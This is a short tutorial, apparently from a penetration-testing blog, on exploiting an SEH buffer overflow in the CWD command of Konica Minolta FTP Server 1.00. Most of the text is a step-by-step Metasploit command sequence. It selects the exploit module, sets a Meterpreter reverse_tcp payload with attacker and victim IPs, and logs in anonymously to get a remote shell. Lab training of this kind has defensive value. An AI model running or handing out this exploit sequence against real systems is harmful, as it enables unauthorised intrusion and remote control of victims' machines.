This module exploits an SEH
overflow in Konica Minolta FTP Server 1.00. Konica Minolta FTP fails to check
input size when parsing 'CWD' commands, which leads to an SEH overflow. Konica
FTP allows anonymous access by default; valid credentials are typically
unnecessary to exploit this vulnerability.
Exploit Targets
Konica Minolta FTP Server
1.00
Requirement
Attacker: kali Linux
Victim PC: Windows 7
Open
Kali terminal type msfconsole
Now
type use exploit/windows/ftp/kmftp_utility_cwd
msf exploit (kmftp_utility_cwd)>set payload windows/meterpreter/reverse_tcp
msf exploit (kmftp_utility_cwd)>set lhost 192.168.1.5 (IP
of Local Host)
msf exploit (kmftp_utility_cwd)>set rhost 192.168.1.7
msf exploit (kmftp_utility_cwd)>set FTPUSER anonymous
msf exploit (kmftp_utility_cwd)>set FTPPASS raj
msf exploit (kmftp_utility_cwd)>exploit
0 comments:
Post a Comment